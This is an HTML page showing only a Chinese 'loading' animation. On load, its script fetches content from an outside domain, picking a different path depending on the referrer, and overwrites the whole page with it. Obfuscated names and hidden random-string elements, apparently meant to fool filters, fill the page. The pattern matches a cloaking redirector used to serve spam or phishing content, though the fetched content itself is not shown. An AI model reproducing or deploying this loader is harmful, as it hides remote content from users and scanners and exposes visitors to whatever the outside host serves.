<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .zOZBYrSYXE {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .zOZBYrSYXE .IeOV6jGckI {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .zOZBYrSYXE .content {
            line-height: 50px;
            text-align: center
        }

        .zOZBYrSYXE .img {
            width: 100%
        }

        .zOZBYrSYXE .D3rdFe3Vm3v {
            text-align: center
        }

        .zOZBYrSYXE .D3rdFe3Vm3v span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .zOZBYrSYXE .D3rdFe3Vm3v span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .zOZBYrSYXE .D3rdFe3Vm3v span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .zOZBYrSYXE .D3rdFe3Vm3v span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .zOZBYrSYXE .D3rdFe3Vm3v span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .zOZBYrSYXE .D3rdFe3Vm3v span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .zOZBYrSYXE .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function yWisrwax7(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var gjuU1 = yWisrwax7('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ gjuU1 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ gjuU1 +".html?a=share";
		}
		
        Mi5ECiz=url+"#"+new Date().getTime();
        Mi5ECiz && function() {
            $.get(Mi5ECiz, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >NjUJZwNKEbv0QvSiJXzb6y4wgpO839DEfUu9lHh25XpmG0SzseafZ7RRcSMx9E2cj0gCw81gBLHginJtrFt7p1bw</h1>
<img  src='' style='display:none'>
<h1 style='display:none' >NjUJZwNKEbv0QvSiJXzb6y4wgpO839DEfUu9lHh25XpmG0SzseafZ7RRcSMx9E2cj0gCw81gBLHginJtrFt7p1bw</h1>
<p  style='display:none'>ogu0ESQKLikgYBkXEQveREKW1B2VF6HwMfppZCCZnnsp99fWS9hxvsUqpILI0rcS1D</p><div class="zOZBYrSYXE">
    <div class="IeOV6jGckI">
        <div class="D3rdFe3Vm3v">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>wVteBFqq0M7mSjLb3H2bJOolkVa0mzvOn5rEI8mphak2r0OgnUr</span>
<b style='display:none' >VzhQZ759SKkaaJUdjojRDIE8FxgWvEUVYV6rjxMVT2a9vL3yXH5ePpaQciWilAHOu</b>
<span style='display:none'>wVteBFqq0M7mSjLb3H2bJOolkVa0mzvOn5rEI8mphak2r0OgnUr</span>
<h1 style='display:none' >rKq4oOHBtvgQInapXojBWWNxPH3FRJDbZYQmP1o5gqZVyIHdip1RCAtgSMtQUf3ai7zGFXz0m</h1>
<span style='display:none'>wVteBFqq0M7mSjLb3H2bJOolkVa0mzvOn5rEI8mphak2r0OgnUr</span>
<span style='display:none'>wVteBFqq0M7mSjLb3H2bJOolkVa0mzvOn5rEI8mphak2r0OgnUr</span>
<ul style='display:none' >OZOctv5jxsY6Hrlv5fxsiu4kDX15a0C6oDnAcThIn96rPrUJB</ul>
<h1 style='display:none' >rKq4oOHBtvgQInapXojBWWNxPH3FRJDbZYQmP1o5gqZVyIHdip1RCAtgSMtQUf3ai7zGFXz0m</h1>
<a  href='#' style='display:none'>F3scNZsQhhHv65Xg8Hmz8dFi2sBMtDa8XRBJ8twyeb9syySy4m9KzwRJ4XCghvvjVEyvd44vZ86m4B6EVmv7fzbdKJN3Z</a></body>
</html>